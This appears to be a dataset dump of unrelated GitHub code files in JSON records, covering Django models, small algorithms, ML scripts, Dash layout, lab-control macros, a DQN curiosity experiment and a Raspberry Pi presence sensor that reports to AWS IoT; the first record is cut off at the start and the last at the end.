self.currency)\n\n    def delete(self, *args, **kwargs):\n        shares = self.share_set.all()\n        for share in shares:\n            share.delete()\n        super().delete(*args, **kwargs)\n\nclass Share(models.Model):\n    value = models.DecimalField(decimal_places=2, max_digits=10)\n    owner = models.ForeignKey(User, on_delete=models.PROTECT)\n    expense = models.ForeignKey(Expense, on_delete=models.PROTECT)\n\n    def __str__(self):\n        return \"{} {}\".format(self.owner, self.value)\n","repo_name":"mbombar/thunes","sub_path":"MyMoney/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34586495932","text":"#- Write a function that helps decide whether it is worth operating a shop\n#\t- parameters\n#\t\t- monthly fixed overhead cost\n#\t\t- monthly wage cost\n#\t\t- expected monthly revenue\n#\t\t- average profit % of the products\n#\t- return value: how much money \"remains\" at the end\n\t\ndef bolt(rezsi,ber, forgalom,haszon):\n    return (forgalom*haszon/100)-rezsi-ber\n\n \n\nrezsi = int(input('Enter how much overhead you pay per month: '))\nber = int(input('Enter how much you pay in wages: '))\nforgalom = int(input('Enter your expected monthly revenue: '))\nhaszon = float(input('Enter the profit percentage on your products: '))\nosszHaszon=bolt(rezsi, ber, forgalom, haszon)\nprint(f'The profit of the shop is {osszHaszon}')\n\nif osszHaszon>0:\n    print('It is worth operating the shop.')\nelse:\n    print('It is not worth operating the shop.')\n\n","repo_name":"fabrykevin/agazati","sub_path":"agazatialapvizsgagyujt/python + web kész feladatok + leírás (saját)/Python/20230216/bolt.py","file_name":"bolt.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"hu","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2802184926","text":"import os\n#update 'base_path' with project root folder that contains all the git repositories\nbase_path= \"/Users/razvan_vancea/Projects/QAPractice/\"\n\n#update 'repositories' with each repository's folder name\nrepositories=[\"automation\",\"users\",\"webapp\"]\n\n#update 'branch' with your default branch name: 'main' or 'master'?\nbranch=\"main\"\n\ngit = \" && git checkout \"+branch+\" && git pull && git checkout -\"\nfor repo in repositories:\n    print(\"========== \"+repo+\" ==========\")\n    os.system(\"cd \"+base_path+repo+git)\n    \n","repo_name":"razvanvancea/cli-git-pull-microservices","sub_path":"git_pull.py","file_name":"git_pull.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33151493846","text":"import sys\ninput = sys.stdin.readline\n\nlst = []\nzero, one = 0, 0\nn = int(input())\n\ndef check_paper(paper):\n    max_v = max(map(max, paper))\n    min_v = min(map(min, paper))\n    if max_v == min_v:\n        return True\n    else:\n        return False\n\ndef re(n, x, y):\n    global zero, one\n    if check_paper([i[y : y + n] for i in lst[x : x + n]]):\n        if lst[x][y]:\n            one += 1\n        else:\n            zero += 1\n    else:\n        re(n // 2, x, y)\n        re(n // 2, x, y + n // 2)\n        re(n // 2, x + n // 2, y)\n        re(n // 2, x + n // 2, y + n // 2)\n    \n\nfor i in range(n):\n    lst.append(list(map(int, input().split())))\n\nre(n, 0, 0)\n\nprint(zero)\nprint(one)\n\n\n\n\n\n\n","repo_name":"HeoYou/algorithm-python","sub_path":"Q2630 색종이 만들기(분할 정복).py","file_name":"Q2630 색종이 만들기(분할 
정복).py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30334195123","text":"\"\"\"\n In this stage, various classification metrics are extracted from the model.\n\"\"\"\nimport os\n\nimport pandas as pd\nimport json\nimport joblib\nimport sklearn\n\nfrom utils.evaluation.classification_metrics import get_classification_metrics\nfrom utils.dvc.params import get_params\nfrom utils.misc import create_dir\n\nparams = get_params('all')\n\nDATASET = params['dataset']\nMODEL_DIR = os.path.join('models', DATASET, 'bin')\nMETRICS_DIR = os.path.join('metrics', DATASET)\nVIS_DIR = os.path.join('visualisation', DATASET)\ncreate_dir(METRICS_DIR)\n\ncae_df = pd.read_csv(\n os.path.join('data', 'processed', DATASET, 'tabular', 'cae_mse.csv'),\n index_col=0\n)\n\ncomplexity_df = pd.read_csv(\n os.path.join('data', 'processed', DATASET, 'tabular', 'complexity.csv'),\n index_col=0)\n\ncomplexity_df = complexity_df[['jpeg_mse']]\ncae_df = cae_df.join(complexity_df)\n\ncae_df['label'] = cae_df['label'].apply(\n lambda x: 1 if x == 'positive' else 0)\n\nmask = cae_df['data_split'] == 'test'\ntest_df = cae_df[mask].drop(columns=['data_split'])\n\n# Load models\ncae_model = joblib.load(\n os.path.join(MODEL_DIR, 'logistic_regression_cae.joblib'))\njpeg_model = joblib.load(\n os.path.join(MODEL_DIR, 'logistic_regression_jpeg.joblib'))\ncombined_model = joblib.load(\n os.path.join(MODEL_DIR, 'logistic_regression_combined.joblib'))\n\n\ncae_test_metrics = get_classification_metrics(\n test_df['label'],\n cae_model.predict(test_df.drop(columns=['label', 'jpeg_mse'])))\n\n# Write metrics on json file\nmetrics = {\n 'test_f1': cae_test_metrics['f1'],\n 'test_acc': cae_test_metrics['accuracy'],\n 'test_prec': cae_test_metrics['precision'],\n 'test_rec': cae_test_metrics['recall']\n}\n\nwith open(\n os.path.join(METRICS_DIR, 'cae_metrics.json'), 'w') as f:\n json.dump(metrics, f)\n\ncm_display = sklearn.metrics.ConfusionMatrixDisplay(\n confusion_matrix=cae_test_metrics['conf_matrix'],\n display_labels=['Normal', 'Anomalous'])\n\ncm_display.plot().figure_.savefig(\n os.path.join(VIS_DIR, 'cae_confusion_matrix.png'))\n\njpeg_test_metrics = get_classification_metrics(\n test_df['label'],\n jpeg_model.predict(test_df.drop(columns=['label', 'cae_mse'])))\nmetrics = {\n 'test_f1': jpeg_test_metrics['f1'],\n 'test_acc': jpeg_test_metrics['accuracy'],\n 'test_prec': jpeg_test_metrics['precision'],\n 'test_rec': jpeg_test_metrics['recall']\n}\n\nwith open(\n os.path.join(METRICS_DIR, 'jpeg_metrics.json'), 'w') as f:\n json.dump(metrics, f)\n\ncm_display = sklearn.metrics.ConfusionMatrixDisplay(\n confusion_matrix=jpeg_test_metrics['conf_matrix'],\n display_labels=['Normal', 'Anomalous'])\ncm_display.plot().figure_.savefig(\n os.path.join(VIS_DIR, 'jpeg_confusion_matrix.png'))\n\ncombined_test_metrics = get_classification_metrics(\n test_df['label'], combined_model.predict(test_df.drop(columns=['label'])))\nmetrics = {\n 'test_f1': combined_test_metrics['f1'],\n 'test_acc': combined_test_metrics['accuracy'],\n 'test_prec': combined_test_metrics['precision'],\n 'test_rec': combined_test_metrics['recall']\n}\n\nwith open(\n os.path.join(METRICS_DIR, 'combined_metrics.json'), 'w') as f:\n json.dump(metrics, f)\n\ncm_display = sklearn.metrics.ConfusionMatrixDisplay(\n confusion_matrix=combined_test_metrics['conf_matrix'],\n display_labels=['Normal', 'Anomalous'])\ncm_display.plot().figure_.savefig(\n os.path.join(VIS_DIR, 
'combined_confusion_matrix.png'))\n","repo_name":"alexsandercaac/img-complexity-cae","sub_path":"src/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":3420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34519211044","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\ncomic_con = pd.read_csv('./dataset/comic_con.csv', index_col=0)\ncomic_con.head()\n\n# preprocessing\nfrom scipy.cluster.vq import whiten\nfrom scipy.cluster.hierarchy import linkage, fcluster\n\ncomic_con['x_scaled'] = whiten(comic_con['x_coordinate'])\ncomic_con['y_scaled'] = whiten(comic_con['y_coordinate'])\n\n# Hierarchical clustering: ward method\n# Use the linkage()\ndistance_matrix = linkage(comic_con[['x_scaled', 'y_scaled']], method='ward', metric='euclidean')\n\n# Assign cluster labels\ncomic_con['cluster_labels'] = fcluster(distance_matrix, 2, criterion='maxclust')\n\n# Plot clusters\nsns.scatterplot(x='x_scaled', y='y_scaled', hue='cluster_labels', data=comic_con);\n\n# Hierarchical clustering: single method\n# Use the linkage()\ndistance_matrix = linkage(comic_con[['x_scaled', 'y_scaled']], method='single', metric='euclidean')\n\n# Assign cluster labels\ncomic_con['cluster_labels'] = fcluster(distance_matrix, 2, criterion='maxclust')\n\n# Plot clusters\nsns.scatterplot(x='x_scaled', y='y_scaled', hue='cluster_labels', data=comic_con);\n\n# Hierarchical clustering: complete method\n# Use the linkage()\ndistance_matrix = linkage(comic_con[['x_scaled', 'y_scaled']], method='complete', metric='euclidean')\n\n# Assign cluster labels\ncomic_con['cluster_labels'] = fcluster(distance_matrix, 2, criterion='maxclust')\n\n# Plot clusters\nsns.scatterplot(x='x_scaled', y='y_scaled', hue='cluster_labels', data=comic_con);\n\n# Visualize clusters with matplotlib\n# Define a colors dictionary for clusters\ncolors = {1:'red', 2:'blue'}\n\n# Plot the scatter plot\ncomic_con.plot.scatter(x='x_scaled', y='y_scaled', c=comic_con['cluster_labels'].apply(lambda x: colors[x]));\n\n# Visualize clusters with seaborn\n# Plot a scatter plot using seaborn\nsns.scatterplot(x='x_scaled', y='y_scaled', hue='cluster_labels', data=comic_con)\n\n# How many clusters?\n# Create a dendrogram\nfrom scipy.cluster.hierarchy import dendrogram\n\n# Create a dendrogram\ndn = dendrogram(distance_matrix)","repo_name":"leandro-raposo/projects","sub_path":"01_clustering/ComicCon.py","file_name":"ComicCon.py","file_ext":"py","file_size_in_byte":2011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73289827664","text":"import sys\nimport os\n\ntest_mode_state = False\ntest_env_var_read = False\n\n\ndef do_error_exit(log_text):\n    \"\"\"\n    log an error and exit with return code 1\n\n    Parameters\n    ----------\n    log_text : str\n        the text to log as error\n    \"\"\"\n\n    print(f\"Error: {log_text}\", file=sys.stderr)\n    exit(1)\n\n\ndef grab(structure=None, path=None, separator=\".\", fallback=None):\n    \"\"\"\n    get data from a complex object/json structure with a\n    \".\" separated path information. 
If a part of a path\n    is not present then this function returns the\n    value of fallback (default: \"None\").\n\n    example structure:\n    data_structure = {\n        \"rows\": [{\n            \"elements\": [{\n                \"distance\": {\n                    \"text\": \"94.6 mi\",\n                    \"value\": 152193\n                },\n                \"status\": \"OK\"\n            }]\n        }]\n    }\n    example path:\n        \"rows.0.elements.0.distance.value\"\n    example return value:\n        152193\n\n    Parameters\n    ----------\n    structure: dict, list, object\n        object structure to extract data from\n    path: str\n        nested path to extract\n    separator: str\n        path separator to use. Helpful if a path element\n        contains the default (.) separator.\n    fallback: dict, list, str, int\n        data to return if no match was found\n\n    Returns\n    -------\n    str, dict, list\n        the desired path element if found, otherwise None\n    \"\"\"\n\n    max_recursion_level = 100\n\n    current_level = 0\n    levels = len(path.split(separator))\n\n    if structure is None or path is None:\n        return fallback\n\n    # noinspection PyBroadException\n    def traverse(r_structure, r_path):\n        nonlocal current_level\n        current_level += 1\n\n        if current_level > max_recursion_level:\n            return fallback\n\n        for attribute in r_path.split(separator):\n            if isinstance(r_structure, dict):\n                r_structure = {k.lower(): v for k, v in r_structure.items()}\n\n            try:\n                if isinstance(r_structure, list):\n                    data = r_structure[int(attribute)]\n                elif isinstance(r_structure, dict):\n                    data = r_structure.get(attribute.lower())\n                else:\n                    data = getattr(r_structure, attribute)\n\n            except Exception:\n                return fallback\n\n            if current_level == levels:\n                return data if data is not None else fallback\n            else:\n                return traverse(data, separator.join(r_path.split(separator)[1:]))\n\n    return traverse(structure, path)\n\n\ndef in_test_mode():\n\n    global test_env_var_read, test_mode_state\n\n    if test_env_var_read is False:\n        test_mode_state = True if os.environ.get(\"TESTMODE\") else False\n        test_env_var_read = True\n        if test_mode_state is True:\n            print(\"Running in TESTMODE\")\n\n    return test_mode_state\n","repo_name":"bb-Ricardo/fritzinfluxdb","sub_path":"fritzinfluxdb/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":3064,"program_lang":"python","lang":"en","doc_type":"code","stars":125,"dataset":"github-code","pt":"48"} +{"seq_id":"74868086865","text":"from collections import deque\r\n\r\nqueue = [1, 2, 3]\r\n\r\nqueue.pop(0)\r\nqueue.pop(0)\r\n\r\n# Queues implemented efficiently in the standard library\r\nqueue = deque([1, 2, 3])\r\n\r\n# Add the elements\r\nqueue.append(4)\r\nqueue.append(5)\r\n\r\n# Remove the elements\r\nqueue.popleft()\r\nqueue.popleft()","repo_name":"danielmserna/U.-Austral.-Estructuras-de-datos-en-Python","sub_path":"ListasComoColas.py","file_name":"ListasComoColas.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"16863869341","text":"# built-in\nimport re\nfrom datetime import datetime\nfrom hashlib import sha256\nfrom logging import getLogger\nfrom pathlib import Path\nfrom typing import Dict, Iterable, List, Optional, Tuple\n\n# external\nimport attr\nfrom packaging.requirements import Requirement\nfrom packaging.utils import canonicalize_name\n\n# app\nfrom ...cache import TextCache\nfrom ...config import config\nfrom ...constants import ARCHIVE_EXTENSIONS\nfrom ...models.release import Release\nfrom ._base import WarehouseBaseRepo\n\n\nlogger = getLogger('dephell.repositories.warehouse.simple')\nREX_WORD = re.compile('[a-zA-Z]+')\n\n\n@attr.s()\nclass 
WarehouseLocalRepo(WarehouseBaseRepo):\n name = attr.ib(type=str)\n path = attr.ib(type=Path)\n\n prereleases = attr.ib(type=bool, factory=lambda: config['prereleases']) # allow prereleases\n from_config = attr.ib(type=bool, default=False)\n propagate = True # deps of deps will inherit repo\n\n def __attrs_post_init__(self) -> None:\n if isinstance(self.path, str):\n self.path = Path(self.path)\n\n def get_releases(self, dep) -> tuple:\n\n releases_info = dict()\n for archive_path in self.path.glob('**/*'):\n if not archive_path.name.endswith(ARCHIVE_EXTENSIONS):\n continue\n name, version = self._parse_name(archive_path.name)\n if canonicalize_name(name) != dep.name:\n continue\n if not version:\n continue\n\n if version not in releases_info:\n releases_info[version] = []\n releases_info[version].append(self._get_hash(path=archive_path))\n\n # init releases\n releases = []\n prereleases = []\n for version, hashes in releases_info.items():\n # ignore version if no files for release\n release = Release(\n raw_name=dep.raw_name,\n version=version,\n time=datetime.fromtimestamp(self.path.stat().st_mtime),\n hashes=hashes,\n extra=dep.extra,\n )\n\n # filter prereleases if needed\n if release.version.is_prerelease:\n prereleases.append(release)\n if not self.prereleases and not dep.prereleases:\n continue\n\n releases.append(release)\n\n # special case for black: if there is no releases, but found some\n # prereleases, implicitly allow prereleases for this package\n if not releases and prereleases:\n releases = prereleases\n\n releases.sort(reverse=True)\n return tuple(releases)\n\n async def get_dependencies(self, name: str, version: str,\n extra: Optional[str] = None) -> Tuple[Requirement, ...]:\n cache = TextCache('warehouse-local', 'deps', name, str(version))\n deps = cache.load()\n if deps is None:\n deps = self._get_deps_from_files(name=name, version=version)\n cache.dump(deps)\n elif deps == ['']:\n return ()\n return self._convert_deps(deps=deps, name=name, version=version, extra=extra)\n\n def search(self, query: Iterable[str]) -> List[Dict[str, str]]:\n raise NotImplementedError\n\n @staticmethod\n def _get_hash(path: Path) -> str:\n digest = sha256()\n with path.open('rb') as stream:\n for byte_block in iter(lambda: stream.read(4096), b''):\n digest.update(byte_block)\n return digest.hexdigest()\n\n def _get_deps_from_files(self, name, version):\n # app\n from ...converters import SDistConverter, WheelConverter\n\n paths = []\n for path in self.path.glob('**/*'):\n if not path.name.endswith(ARCHIVE_EXTENSIONS):\n continue\n file_name, file_version = self._parse_name(path.name)\n if canonicalize_name(file_name) != name:\n continue\n if not file_version or file_version != str(version):\n continue\n paths.append(path)\n\n sdist = SDistConverter()\n wheel = WheelConverter()\n rules = (\n (wheel, 'py3-none-any.whl'),\n (wheel, '-none-any.whl'),\n (wheel, '.whl'),\n (sdist, '.tar.gz'),\n (sdist, '.zip'),\n )\n\n for converter, ext in rules:\n for path in paths:\n if not path.name.endswith(ext):\n continue\n root = converter.load(path)\n deps = []\n for dep in root.dependencies:\n if dep.envs == {'main'}:\n deps.append(str(dep))\n else:\n for env in dep.envs.copy() - {'main'}:\n dep.envs = {env}\n deps.append(str(dep))\n return tuple(deps)\n return 
()\n","repo_name":"dephell/dephell","sub_path":"dephell/repositories/_warehouse/_local.py","file_name":"_local.py","file_ext":"py","file_size_in_byte":4882,"program_lang":"python","lang":"en","doc_type":"code","stars":1758,"dataset":"github-code","pt":"48"} +{"seq_id":"10749886842","text":"import dash_bootstrap_components as dbc\nfrom dash import dcc, html\n\n# we use the Row and Col components to construct the sidebar header\n# it consists of a title, and a toggle, the latter is hidden on large screens\nright_sidebar_header = dbc.Row(\n [\n dbc.Col(\n [\n html.Button(\n # use the Bootstrap navbar-toggler classes to style\n html.Span(className=\"navbar-toggler-icon right-icon-custom\"),\n className=\"navbar-toggler\",\n # the navbar-toggler classes don't set color\n style={\n \"color\": \"rgba(0,0,0,.5)\",\n \"border-color\": \"rgba(0,0,0,.1)\",\n },\n id=\"right-navbar-toggle\",\n ),\n html.Button(\n # use the Bootstrap navbar-toggler classes to style\n html.Span(className=\"navbar-toggler-icon right-icon-custom\"),\n className=\"navbar-toggler\",\n # the navbar-toggler classes don't set color\n style={\n \"color\": \"rgba(0,0,0,.5)\",\n \"border-color\": \"rgba(0,0,0,.1)\",\n },\n id=\"right-sidebar-toggle\",\n ),\n ],\n # the column containing the toggle will be only as wide as the\n # toggle, resulting in the toggle being right aligned\n width=\"auto\",\n # vertically align the toggle in the center\n align=\"center\",\n ),\n dbc.Col(html.P(\"transcription\", className=\"font-sm\")),\n ]\n)\n\nright_sidebar = html.Div(\n [\n right_sidebar_header,\n # we wrap the horizontal rule and short blurb in a div that can be\n # hidden on a small screen\n html.Div(\n [\n html.Hr(),\n html.P(\n \"Sidebar Right\",\n className=\"lead\",\n ),\n ],\n id=\"right-blurb\",\n ),\n # use the Collapse component to animate hiding / revealing links\n dbc.Collapse(\n\n [html.Div(f\"Itens in the second Sidebar{n}\") for n in range(0, 10)],\n id=\"right-collapse\",\n ),\n ],\n id=\"right-sidebar\",\n)\n","repo_name":"kaburelabs/dash-double-sidebar-comp","sub_path":"sidebar_right.py","file_name":"sidebar_right.py","file_ext":"py","file_size_in_byte":2334,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"13789374331","text":"from conans import ConanFile, CMake, tools\n\n\nclass MichaQtUtilisLibConan(ConanFile):\n name = \"MichaQtUtilisLib\"\n version = \"0.2\"\n license = \"MIT - https://github.com/jackdaimond/MichaQtUtilisLib/blob/master/LICENSE\"\n author = \"Michael Kloske\"\n url = \"https://github.com/jackdaimond/MichaQtUtilisLib.git\"\n description = \"Contains several functionalities often used in other Qt applications.\"\n settings = \"os\", \"compiler\", \"build_type\", \"arch\"\n options = {\"shared\": [True, False], \"fPIC\": [True, False]}\n default_options = {\"shared\": False, \"fPIC\": True}\n generators = \"qmake\"\n\n scm = {\n \"type\": \"git\",\n \"subfolder\": \"\",\n \"url\": \"https://github.com/jackdaimond/MichaQtUtilisLib.git\",\n \"revision\": \"auto\"\n }\n\n def config_options(self):\n if self.settings.os == \"Windows\":\n del self.options.fPIC\n\n #def source(self):\n # self.run(\"git clone https://github.com/conan-io/hello.git\")\n # # This small hack might be useful to guarantee proper /MT /MD linkage\n # # in MSVC if the packaged project doesn't have variables to set it\n # # properly\n\n def build(self):\n if(self.settings.build_type == \"Debug\"):\n self.run(\"qmake MichaQtUtilisLib.pro CONFIG+=debug\")\n else:\n 
self.run(\"qmake MichaQtUtilisLib.pro CONFIG+=release\")\n \n self.run(\"nmake\")\n # Explicit way:\n # self.run('cmake %s/hello %s'\n # % (self.source_folder, cmake.command_line))\n # self.run(\"cmake --build . %s\" % cmake.build_config)\n\n def package(self):\n self.copy(\"*.h*\", dst=\"include/MichaQtUtilisLib\", src=\"src\")\n self.copy(\"*.lib\", dst=\"lib\", keep_path=False)\n self.copy(\"*.dll\", dst=\"bin\", keep_path=False)\n self.copy(\"*.so\", dst=\"lib\", keep_path=False)\n self.copy(\"*.dylib\", dst=\"lib\", keep_path=False)\n self.copy(\"*.a\", dst=\"lib\", keep_path=False)\n\n def package_info(self):\n self.cpp_info.libs = [\"MichaQtUtilisLib\"]\n","repo_name":"jackdaimond/MichaQtUtilisLib","sub_path":"conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":2050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14897979681","text":"import time\n\nfrom tango import DeviceProxy\nfrom sardana.macroserver.macro import macro\n\n@macro()\ndef ProbeOn(self):\n \"\"\"Macro ProbeOn\"\"\"\n \n Probe=DeviceProxy('raremag/ThorlabsMFF102/flip01')\n if Probe.isClose:\n self.output(\"Probe shutter is already open\")\n else:\n Probe.close()\n time.sleep(1)\n if Probe.isClose:\n self.output(\"Probe shutter opened\")\n else:\n self.output(\"Could not open Probe shutter\")\n\n@macro()\ndef ProbeOff(self):\n \"\"\"Macro ProbeOff\"\"\"\n \n Probe=DeviceProxy('raremag/ThorlabsMFF102/flip01')\n if Probe.isOpen:\n self.output(\"Probe shutter is already closed\")\n else:\n Probe.open()\n time.sleep(1)\n if Probe.isOpen:\n self.output(\"Probe shutter closed\")\n else:\n self.output(\"Could not close Probe shutter\")\n\n@macro()\ndef PumpOn(self):\n \"\"\"Macro PumpOn\"\"\"\n \n Pump=DeviceProxy('raremag/ThorlabsMFF102/flip02')\n if Pump.isOpen:\n self.output(\"Pump shutter is already open\")\n else:\n Pump.open()\n time.sleep(1)\n if Pump.isOpen:\n self.output(\"Pump shutter opened\")\n else:\n self.output(\"Could not open Pump shutter\")\n\n@macro()\ndef PumpOff(self):\n \"\"\"Macro PumpOff\"\"\"\n \n Pump=DeviceProxy('raremag/ThorlabsMFF102/flip02')\n if Pump.isClose:\n self.output(\"Pump shutter is already closed\")\n else:\n Pump.close()\n time.sleep(1)\n if Pump.isClose:\n self.output(\"Pump shutter closed\")\n else:\n self.output(\"Could not close Pump shutter\")","repo_name":"MBI-Div-B/sardana-mbi-raremag","sub_path":"macros/laserShutter.py","file_name":"laserShutter.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22820414347","text":"import random\n\nif __name__ == \"__main__\":\n s = ''\n for i in range(3):\n s += input() + '\\n'\n s = s[:-1]\n status = s[0]\n if status == \"x\":\n status = 1\n else:\n status = 2\n s = s[1:]\n board = [[int(i) for i in line.split()] for line in s.split('\\n')]\n nulls = 0\n moves = []\n for i in range(3):\n for j in range(3):\n if board[j][i] == 0:\n moves.append((i + 1, j + 1))\n x, y = random.choice(moves)\n print(x, y)","repo_name":"RobertArifulin/BotsFight","sub_path":"bots/tictactoe_random.py","file_name":"tictactoe_random.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"16895686719","text":"\"\"\"\r\nhere curiosity by random network distillation is used for exploration .\r\nepsilon greedy is not used for exploration.\r\nAnd the policy rollout is is episodic even 
though we are not using extrinsic rewards at all,\r\nsince once it wins it returns to the default state, and this would discourage curiosity-based learning to win.\r\n\r\n\"\"\"\r\n\r\nimport tensorflow as tf\r\nimport numpy as np\r\nimport gym\r\nfrom collections import deque \r\nimport random # for random sampling from deque\r\n\r\nenv=gym.make('MountainCar-v0')\r\n\r\n\r\nenv=env.unwrapped\r\n\r\nn_obs=2\r\nn_act=3\r\n\r\nqprimary = tf.keras.models.Sequential()\r\nqprimary.add(tf.keras.layers.Dense(units=128,input_dim=n_obs, activation='sigmoid'))\r\nqprimary.add(tf.keras.layers.Dense(units=128, activation=\"relu\"))\r\nqprimary.add(tf.keras.layers.Dense(units=n_act, activation=None))\r\n#optimizer=tf.keras.optimizers.Adam(lr=0.001,beta_1=0.9,epsilon=None,decay=0.00,amsgrad=False)\r\nqprimary.compile(loss=\"mse\", optimizer=\"RMSprop\", metrics=['accuracy'])\r\nqprimary.summary()\r\n\r\nqtarget = tf.keras.models.Sequential()\r\nqtarget.add(tf.keras.layers.Dense(units=128,input_dim=n_obs, activation='sigmoid'))\r\nqtarget.add(tf.keras.layers.Dense(units=128, activation=\"relu\"))\r\nqtarget.add(tf.keras.layers.Dense(units=n_act, activation=None))\r\n#optimizer=tf.keras.optimizers.Adam(lr=0.001,beta_1=0.9,epsilon=None,decay=0.00,amsgrad=False)\r\nqtarget.compile(loss=\"mse\", optimizer=\"RMSprop\", metrics=['accuracy'])\r\nqtarget.summary()\r\n\r\n\r\n\r\nencoder = tf.keras.models.Sequential()\r\nencoder.add(tf.keras.layers.Dense(units=128,input_dim=2, activation='relu'))\r\nencoder.add(tf.keras.layers.Dense(units=1000, activation=\"sigmoid\"))\r\nencoder.summary()\r\nencoder.trainable=False\r\n\r\npredictor= tf.keras.models.Sequential()\r\npredictor.add(tf.keras.layers.Dense(units=128,input_dim=2, activation='relu'))\r\npredictor.add(tf.keras.layers.Dense(units=1000, activation=\"sigmoid\"))\r\n\r\npredictor.compile(loss=\"mse\", optimizer=\"RMSprop\", metrics=['accuracy'])\r\npredictor.summary()\r\n\r\n\r\n\r\nInitial_curiosity_FILE=r\"C:\\\\Users\\\\Dell\\\\Desktop\\\\holidASY\\\\dqn_rnd_curiosity_keras.h5\"\r\ntf.keras.models.save_model(model=predictor,filepath= Initial_curiosity_FILE ,overwrite=True,include_optimizer=True)\r\nprint(\"initial curiosity saved\")\r\n\r\n\r\n\r\n\r\n\r\nmemory=deque(maxlen=2000)\r\nepsilon=1.0\r\nepsilon_min=0.01\r\nepsilon_decay=0.99\r\ndef restore_curiosity():\r\n\tglobal predictor\r\n\tpredictor=tf.keras.models.load_model( Initial_curiosity_FILE )\r\n\tpredictor.compile(loss=\"mse\", optimizer=\"RMSprop\", metrics=['accuracy'])\r\n\tprint(\"curiosity restored\")\r\n\r\ndef act(s):\r\n\tglobal epsilon\r\n\tepsilon=epsilon*epsilon_decay\r\n\tepsilon=max(epsilon,epsilon_min)\r\n\t# No random action taken => pure curiosity\r\n\t#if np.random.random() n[ i+1 ]:\n\t\t\t\tx = n[ i+1 ]\n\t\t\t\tn[ i+1 ] = n[ i ]\n\t\t\t\tn[ i ] = x\n\t\t\t\tisChanged = True\n\n\n\treturn n\n\n\nif __name__ == '__main__':\n\t\n\tl = [ 10, 0, 5, 3, 20, 1, 54 ] \n\n\tprint( boublesort( l ) )","repo_name":"dragenet/matura-informatyka-python","sub_path":"8_sortowanie_babelkowe/boublesort.py","file_name":"boublesort.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21456283130","text":"#### CREDITS #################################################################\n#\n# This script creates a confidence level of a person being present and reports that\n# into AWS IoT. 
LED outputs provided for visual feedback of operation (optional).\n#\n# For Python 3\n#\n# This is not production - it is Proof-of-Concept (PoC) only\n#\n####################################################################################\n#\n# Created by Ian Fayers, with extra special thanks to Alex Fayers for his\n# implementation of the confidence algorithm and to Thiha Soe for his easy IoT\n# reporting. Thanks to Richard Westby-Nunn for the inspiration.\n#\n#\n# November 2019 - created as part of the re:Invent Builders Fair\n#\n####################################################################################\n\n# import RPi.GPIO as GPIO\nimport datetime\nimport time\nimport json\nimport requests\nimport sys\nfrom gpiozero import MotionSensor\nfrom gpiozero import LED\n\n#### VARIABLES ###############################################################\n\nloopDelay = 2 # time to wait between movement checks\nminConfidence = 0 # minimum value of confidence that there is a person\nmaxConfidence = 50 # maximum value of confidence that there is a person\n\nstartConfidence = 0 # value of confidence to start the script with\n\nhighThreshold = 30 # value of confidence that will indicate there is a person\nlowThreshold= 10 # value of confidence that will indicate there is no person\n\naddValue = 5 # value to add to confidence upon movement\nsubValue = 3 # value to remove from confidence when there is no movement\n\npersonPresent = 0 # 0 if person not there, 1 if person there\nreminderAnnounce = 270 # number of seconds to re-announce status (to ensure continuous presence is shown correctly)\n\npath = \"/home/pi/iot/\" # base path for the certificate files\nclient_cert = path + \"6b148d4216-certificate.pem.crt\" # obtained from AWS IoT - note this ID will be different for you\nclient_key = path + \"6b148d4216-private.pem.key\" # obtained from AWS IoT - note this ID will be different for you\nroot_cert = path + \"AmazonRootCA1.pem\" # Amazon root-cert obtained from https://www.amazontrust.com/repository/\nurl = \"https://OVERTYPETHIS-ats.iot.us-east-2.amazonaws.com:8443/topics/sensorupdate\" # URL for this Sensor - change OVERTYPETHIS, in fact, change the whole string to the one from your follow-along in the tutorial pack\n\n##### FUNCTIONS ################################################################\n\ndef update_iot(sn, available):\n    current_time = datetime.datetime.now()\n    timestamp = current_time.isoformat()\n    ddb_ttl = int((current_time + datetime.timedelta(minutes=5)).timestamp())\n    payload = {\"sn\": sn, \"updated_time\": timestamp, \"ddb_ttl\": ddb_ttl, \"available\": available }\n    headers = {'content-type': 'application/json'}\n    print(\"Posting: \" + sn + \" - \" + str(timestamp) + \" - \" + str(ddb_ttl) + \" - \" + str(available))\n    try:\n        r = requests.post(url, data=json.dumps(payload), verify=root_cert, headers=headers, cert=(client_cert, client_key))\n        print(r)\n    except Exception as e:\n        print(e)\n        print(\"Post to AWS failed\")\n\n# we'll reverse the serial number to increase the randomness - irrelevant for this small PoC, but useful for scale to mitigate hot-keys\ndef reversestring(s):\n    str = \"\"\n    for i in s:\n        str = i + str\n    return str\n\n# get the serial number of each Pi programmatically; we'll use that as the identifiers for desks/rooms and fix-up on the GUI\ndef getserial():\n    # Extract serial from cpuinfo file\n    cpuserial = \"0000000000000000\"\n    try:\n        f = open('/proc/cpuinfo','r')\n  